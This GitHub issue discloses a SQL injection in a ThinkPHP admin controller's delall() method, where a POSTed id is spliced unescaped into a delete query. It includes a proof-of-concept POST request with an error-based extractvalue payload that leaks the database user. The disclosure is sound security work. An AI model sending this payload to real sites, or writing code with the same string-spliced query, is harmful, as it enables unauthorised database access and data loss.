Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

\App\Manage\Controller\KefuController.class.php has SQLinject #13

Open
f4cky0u opened this issue Jan 12, 2023 · 0 comments
Open

\App\Manage\Controller\KefuController.class.php has SQLinject #13

f4cky0u opened this issue Jan 12, 2023 · 0 comments

Comments

@f4cky0u
Copy link

f4cky0u commented Jan 12, 2023

line: 157 - 196
` public function delall(){
//dump($_POST);
//exit;
$m=D('Advert'); //数据库表,配置文件中定义了表前缀,这里则不需要写
$id = I('post.id');
//dump($id);
//exit;
if ($id==null){
$this->error('请选择删除项!');
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(',',$id).')';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id='.$id;
}
//dump($where);
//exit;

	$m=M('Advert');
	$arr=$m->where($where)->select();
	
	foreach ($arr as $key => $value){
		$images=$value['advert_image'];
		//dump($images);
		//exit;
		unlink('./Uploads/'.$images);
	}
	
	$count=$m->where($where)->delete(); //修改表单用save函数
	if ($count>0){
		$this->success("成功删除{$count}条!");
	}
	else {
		$this->error('批量删除失败!');
	}

}
`

Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.

34901673506227_ pic
34891673506177_ pic

poc:
`POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))

`

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant